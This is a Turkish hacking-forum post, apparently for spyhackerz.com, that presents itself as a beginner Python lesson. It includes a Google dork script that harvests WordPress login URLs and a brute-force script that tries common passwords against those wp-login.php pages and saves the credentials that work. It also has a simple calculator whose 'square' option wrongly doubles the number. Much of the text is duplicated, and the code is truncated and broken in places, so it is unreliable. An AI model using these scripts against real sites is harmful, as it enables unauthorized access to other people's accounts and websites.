merhaba
Ben SanalMuhafız
bir süredir ortalıklarda yoktum yurt dışına cıkmıştım. bundan öncedende kendi kendime ileri seviye python öğreniyordum yurt dışında 3 tane kitap almıştım kitap ingilizce zaten programlamada ingilizce şarttır neyse okudum okudum ulan dedim bu kitaplar bu bizim türklerinkinden kat ve kat daha iyi ben ileri seviye python öğreniyorum yok öyle yok böyle falan diyordum bir kitap vardı 700 sayfalık ismini unuttum şimdi ulan dedim ben hiçbirşey bilmiyormuşum falan filan kitabı bitirdim aklım başıma geldi sizede tabsiye edeyim dedim programaya isteyen 12 yaşında isteyen 40 yaşında başlayabilir ama illaki ondan önce kesinlikle ve kesinlikle bence ingilizce öğrenilmeli ve ingilizce veya çince kaynaklardan öğrenilmeli ha türkçe kaynaklar işe yaramazmı iztihza gibi yazbel gibi işe yarar ama bence onlar geride kalmış gibi şöyle diyim python türkçe eğitilmek ve öğrenilmek istenseydi türkün biri çıkar python'u bulurda ama bakın yabancılar bulmuş o zaman yabancı öğreneceksiniz ha ben size milli benliğinizi unutun demiyorum unutmayın ama python öğrenicekseniz gidin amerikaya orda öğrenin ( bu vesileyle nereye gittiğimide öğrenmiş oldunuz merak eden olursa staj yapıyordum ne stajı diye sormayın söyliyemem
)
neyse benim amacım bu konuda python ile hesap makinesi, dorkmaker, dorkfinder, bruteforce gibi scriptleri birazda olsa anlatıcaktım bakın ama biraz çünkü ben eğer hepsini lankadanak yazsam siz hazıra konmuş olursunuz hem birşey anlamazsınız hemde ayt gibi veletlerden lamer damgası yersiniz o yüzden araştırın...araştırın...araştırın... bakın ben bir konu üzerinde galiba bluetooth chat scripti yazıyordum birşeyi anlamadım googlede de bulamadım deep webe girmek zorunda kaldım yani işiniz gücünüz araştırnak olmalı. (BENCE).
def generateDork():
"""
gibi terimleri iyi bilmelisiniz en azından range() fonksiyonunu iyi bilmelisiniz misal,
"""
range(1, 100)
"""
bu komut basitçe şu demek : 1'den 100'e kadar rakamları sırasıyla ekrana bastır.
neyse şu 3 terimi araştırın hatta şöyle yapın python dorkmaker nasıl yazılır? diye arama yapın 1 ve 2. sayfalarda yoksa youtube videolarına bakın orda mutlaka vardır hadi oda olmadı diyelim
gidin sehrinizideki bir mühendise sorun aq 
google modülü
urllib2 modulu
"""
terimleri iyi bilinmeli ARAŞTIRIN!
şimdi bir örnek vererek hata yapıcam ama bazı kendini bilmez kişiler yok bu lamer birşey bilmiyor falan
neyse
for example:
import sys
import google
from urllib2 import HTTPError
sites = []
def getSites(query, num):
''' Get sites from query'''
try:
for site in google.search(query=query, num=int(num), stop=1):
if site not in sites:
sites.append("http://"+site.split("/")[2]+"/wp-login.php")
except HTTPError:
print "[!] HTTP Error 503 Service Unreachable"
print "[*] Try other dork, if an error still continue use VPN"
if __name__ == "__main__":
if len(sys.argv) == 3:
query = sys.argv[1]
num = sys.argv[2]
getSites(query, num)
print "\n" + "-"*60
for site in sites:
print site
print "\n" + "-"*60
print "[+] %s site found!"%(len(sites))
else:
sys.exit()
İLK ÖNCE ARAŞTIRIN SONRA KODU İNCELEYİN.
sys modülü
"""
çok iyi araştırın.
bunu aslında kısa kesmek istiyorum çünkü bu bence öğrenirken ağır bir konu
neyse youtubede veya googlede arayin detayli anlatimi illaki vardir.
import sys
import requests
found = []
file = open("found.txt", "a")
passwords = ["admin", "pass", "password", "admin123", "qwerty", "123", "123456789"]
def brute(site, username="admin", control=False):
''' Try login to site with username
assword '''
for pwd in passwords:
try:
payload = {"log": username, "pwd": pwd}
req = requests.post(site, data=payload, timeout=5)
if '/wp-admin' in req.url:
if control != False:
print "[+] Site: %s\n\t[*] Username: %s\n\t[*] Password: %s\n%s\n"%(site, username, pwd, "-"*60)
else:
pass
file.write("[+] Site: %s\n\t[*] Username: %s\n\t[*] Password: %s\n%s\n"%(site, username, pwd, "-"*60))
file.flush()
found.append((site, username, pwd))
break
except:
return
if __name__ == '__main__':
''' When script runs directly '''
if len(sys.argv) == 3:
sites = open(sys.argv[1], "r").read().split("\n")
passwords = open(sys.argv[2], "r").read().split("\n")
elif len(sys.argv) == 2:
else:
sys.exit()
for site in sites:
site = "http://" + site.split("/")[2] + "/wp-login.php" # re formatting url for test
print "[-] Trying: ", site
brute(site, control=True)
örneği inceleyin. bu örneği ingilizce eğitim pdfleri veya kitaplarda mevcuttur.
if
print
input
raw_input
else
from
import
"""
gibi python'un yüzeysel komutalrını bilmeniz yeterli bunu herhangi bir python egitim setinde bulabilirsiniz.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#pylint:disable=W0512
#pylint:disable=W0312
#pylint:disable=W0101
#pylint:disable=W0611
from math import sqrt
import sys
import os
import random
q = 1
w = 2
e = 3
r = 4
u = 5
p = 6
print """
POWERED BY SANALMUHAFIZ
TURKISH HACKER
"""
print """
kullanım sözleşmesini okuyunuz. kullanım sözmeşisnde bu dosyanın kopyalanıp , çalınıp veya satılması yasaktır.
"""
soru = raw_input("kullanım sözleşmesini okudunuzmu? E/H =")
if soru != "E":
print "Gelişmiş hesap makinesinden çıkılıyor..."
else:
while True:
print """
GELİŞMİŞ HESAP MAKİNESİNE HOŞ GELDİNİZ."""
print """
toplama için 1 ' i,
çıkarma için 2 ' yi,
çarpma için 3 ' ü,
bölme için 4 ' ü,
sayının karesini bulmak için 5 ' i,
sayının karekökünü bulmak için 6 ' yı
TUŞLAYINIZ.
"""
b = input("lütfen seçim yapınız: ")
if b == q:
toplama1 = input("sayıyı giriniz. : ")
toplama2 = input("sayıyı giriniz. : ")
print "sonuç: ", toplama1 + toplama2
if b == w:
cikarma1 = input("sayıyı giriniz. : ")
cikarma2 = input("sayıyı giriniz. : ")
print "sonuç: ", cikarma1 - cikarma2
if b == e:
carpma1 = input("sayıyı giriniz. : ")
carpma2 = input("sayıyı giriniz. : ")
print "sonuç: ", carpma1 * carpma2
if b == r:
t = input("sayıyı giriniz. : ")
y = input("sayıyı giriniz. : ")
print "sonuç: ", t / y
if b == u:
kare1 = input("sayıyı giriniz. : ")
print "sonuç: ", kare1 * 2
if b == p:
sayi = input("sayıyı giriniz. :")
print "sayının karesi: ", sqrt(sayi)
bu kendim yazdığım bir hesap makinesi ben ona gelismis hesapmakinesi diyorum
incelerseniz basit birşey aslında
q, w, e, r, u, p harflerine sayilari atariz while dongusuyle hesabimizi yaptiktan sonra program kapanmiyor 1, 2, 3, 4, 5, 6 harflerini kullaniciya sundum ve mesela 2 ye basarsaniz cikarma yapabilecegini print ile ekrana bastirdik b ye kullaniciya soru sorduk hani biz q, w, e, r, u, p harflerine sirasiyla 6'ya kadar teker teker sayi atadik if ile b == q simdi q ya 1'i atamistikya kullaniciya b harfi ve input ile sormustukya kullanici 1 yazarsa q ya esit oldugu icin alt satira yani if komutunun bir alt satirina tab tusuna basarak 4 bosluk koyuyoruz bu sayede eger kullanici 1 yazarsa onun alt satirinda isleme devam ediyoruz, alt satira bir c ve bir d harfi atayarak input ile islem yapilacak sayilari girmesini isteriz yani kod su gibi olucak ;
if b == q:
c = input("sayi: )
d = input("diger sayi: ")
print c + d
bunu boyle boyle basit bir hesap makinesi yazabilirsiniz o koddaki c ve d'nin ortasinda olan artiyi " + " isaretini eksi " - " carpi " * " bolme " / " gibi islemler yazabilir bunu alt alta yazarak basit bir hesap makinesi yazabilirsiniz. ustteki kendim versigim sozde " gelismis hesap makinesi " ornegini inceleyebilirsiniz.tabi ben o ornekte kullanim sozlesmesi kabul etme veya etmeme karekok bulma gibi islemleri ekledim tabikide imzami atmayi unutmadim.
karekoku bulmak cok kolay.
"""""""
from math import sqrt
a = input("sayi giriniz: ")
sqrt(a)
"""""""
kodu a harfine kullaniciya bir sayi atamasini istiyor math modulunun icinde olan sqrt secenegi ile a yani kullanicinin atadigi sayinin karekokunu buluyor.
Bu kadar basit
Artik konumuzun uzamasini istemiyorum. Şöyle birşey diyiceğim konu kopyalanamaz falan diyicem zaten üslubu olan halsiyetli olan emege saygi duyan kisi bunu kopyalamaz veya paylasmaz cunku ben bu makaleyi spyhackerz.com için yazdim hadi kopyaladin bu su su kisiye ait alintidir vs. Der bunu sorumlulugu olan kisi yapabilir bu yuzden bunu demicem ama sunu diyecegim:
KONU TAMAMEM BANA AİT.
Ve bir söz söyliyeçeğim :
Her şey print "Hello World" ile başladı.
Gelişmiş hesap makimesinden bir görüntü
not python kodlarini calistirmak icin androidde pydroid adli uygulamayi kullaniyorum
Ben SanalMuhafız
bir süredir ortalıklarda yoktum yurt dışına cıkmıştım. bundan öncedende kendi kendime ileri seviye python öğreniyordum yurt dışında 3 tane kitap almıştım kitap ingilizce zaten programlamada ingilizce şarttır neyse okudum okudum ulan dedim bu kitaplar bu bizim türklerinkinden kat ve kat daha iyi ben ileri seviye python öğreniyorum yok öyle yok böyle falan diyordum bir kitap vardı 700 sayfalık ismini unuttum şimdi ulan dedim ben hiçbirşey bilmiyormuşum falan filan kitabı bitirdim aklım başıma geldi sizede tabsiye edeyim dedim programaya isteyen 12 yaşında isteyen 40 yaşında başlayabilir ama illaki ondan önce kesinlikle ve kesinlikle bence ingilizce öğrenilmeli ve ingilizce veya çince kaynaklardan öğrenilmeli ha türkçe kaynaklar işe yaramazmı iztihza gibi yazbel gibi işe yarar ama bence onlar geride kalmış gibi şöyle diyim python türkçe eğitilmek ve öğrenilmek istenseydi türkün biri çıkar python'u bulurda ama bakın yabancılar bulmuş o zaman yabancı öğreneceksiniz ha ben size milli benliğinizi unutun demiyorum unutmayın ama python öğrenicekseniz gidin amerikaya orda öğrenin ( bu vesileyle nereye gittiğimide öğrenmiş oldunuz merak eden olursa staj yapıyordum ne stajı diye sormayın söyliyemem
neyse benim amacım bu konuda python ile hesap makinesi, dorkmaker, dorkfinder, bruteforce gibi scriptleri birazda olsa anlatıcaktım bakın ama biraz çünkü ben eğer hepsini lankadanak yazsam siz hazıra konmuş olursunuz hem birşey anlamazsınız hemde ayt gibi veletlerden lamer damgası yersiniz o yüzden araştırın...araştırın...araştırın... bakın ben bir konu üzerinde galiba bluetooth chat scripti yazıyordum birşeyi anlamadım googlede de bulamadım deep webe girmek zorunda kaldım yani işiniz gücünüz araştırnak olmalı. (BENCE).
def generateDork():
"""
gibi terimleri iyi bilmelisiniz en azından range() fonksiyonunu iyi bilmelisiniz misal,
"""
range(1, 100)
"""
bu komut basitçe şu demek : 1'den 100'e kadar rakamları sırasıyla ekrana bastır.
neyse şu 3 terimi araştırın hatta şöyle yapın python dorkmaker nasıl yazılır? diye arama yapın 1 ve 2. sayfalarda yoksa youtube videolarına bakın orda mutlaka vardır hadi oda olmadı diyelim
google modülü
urllib2 modulu
"""
terimleri iyi bilinmeli ARAŞTIRIN!
şimdi bir örnek vererek hata yapıcam ama bazı kendini bilmez kişiler yok bu lamer birşey bilmiyor falan
for example:
import sys
import google
from urllib2 import HTTPError
sites = []
def getSites(query, num):
''' Get sites from query'''
try:
for site in google.search(query=query, num=int(num), stop=1):
if site not in sites:
sites.append("http://"+site.split("/")[2]+"/wp-login.php")
except HTTPError:
print "[!] HTTP Error 503 Service Unreachable"
print "[*] Try other dork, if an error still continue use VPN"
if __name__ == "__main__":
if len(sys.argv) == 3:
query = sys.argv[1]
num = sys.argv[2]
getSites(query, num)
print "\n" + "-"*60
for site in sites:
print site
print "\n" + "-"*60
print "[+] %s site found!"%(len(sites))
else:
sys.exit()
İLK ÖNCE ARAŞTIRIN SONRA KODU İNCELEYİN.
sys modülü
"""
çok iyi araştırın.
bunu aslında kısa kesmek istiyorum çünkü bu bence öğrenirken ağır bir konu
import sys
import requests
found = []
file = open("found.txt", "a")
passwords = ["admin", "pass", "password", "admin123", "qwerty", "123", "123456789"]
def brute(site, username="admin", control=False):
''' Try login to site with username
for pwd in passwords:
try:
payload = {"log": username, "pwd": pwd}
req = requests.post(site, data=payload, timeout=5)
if '/wp-admin' in req.url:
if control != False:
print "[+] Site: %s\n\t[*] Username: %s\n\t[*] Password: %s\n%s\n"%(site, username, pwd, "-"*60)
else:
pass
file.write("[+] Site: %s\n\t[*] Username: %s\n\t[*] Password: %s\n%s\n"%(site, username, pwd, "-"*60))
file.flush()
found.append((site, username, pwd))
break
except:
return
if __name__ == '__main__':
''' When script runs directly '''
if len(sys.argv) == 3:
passwords = open(sys.argv[2], "r").read().split("\n")
elif len(sys.argv) == 2:
else:
sys.exit()
for site in sites:
site = "http://" + site.split("/")[2] + "/wp-login.php" # re formatting url for test
print "[-] Trying: ", site
brute(site, control=True)
örneği inceleyin. bu örneği ingilizce eğitim pdfleri veya kitaplarda mevcuttur.
if
input
raw_input
else
from
import
"""
gibi python'un yüzeysel komutalrını bilmeniz yeterli bunu herhangi bir python egitim setinde bulabilirsiniz.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#pylint:disable=W0512
#pylint:disable=W0312
#pylint:disable=W0101
from math import sqrt
import sys
import os
import random
q = 1